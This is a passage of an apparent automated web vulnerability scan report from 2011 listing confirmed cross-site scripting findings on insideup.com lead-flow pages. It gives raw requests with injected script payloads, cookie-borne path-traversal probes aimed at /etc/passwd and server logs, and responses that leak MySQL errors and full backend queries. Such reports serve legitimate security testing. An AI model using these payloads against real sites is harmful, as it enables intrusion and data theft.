OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gka31bfa2jrke1f96r3q7nneq2; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='"--></style></script><script>netsparker(0x0005D7)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D7)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005D8)</script>

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D8)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3tom669iari6jqi8628d1ni0g6; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005D8)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D8)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DB)%3C/script%3E

/ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DB)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005DB)</script>

Request

GET /ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005DB)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7vdc26c0jbkcvb995b9mhtp0c1; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php'"--></style></script><script>netsparker(0x0005DB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005DB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/

/ppc/leadflow/parl00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005D9)</script>

Request

GET /ppc/leadflow/parl00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
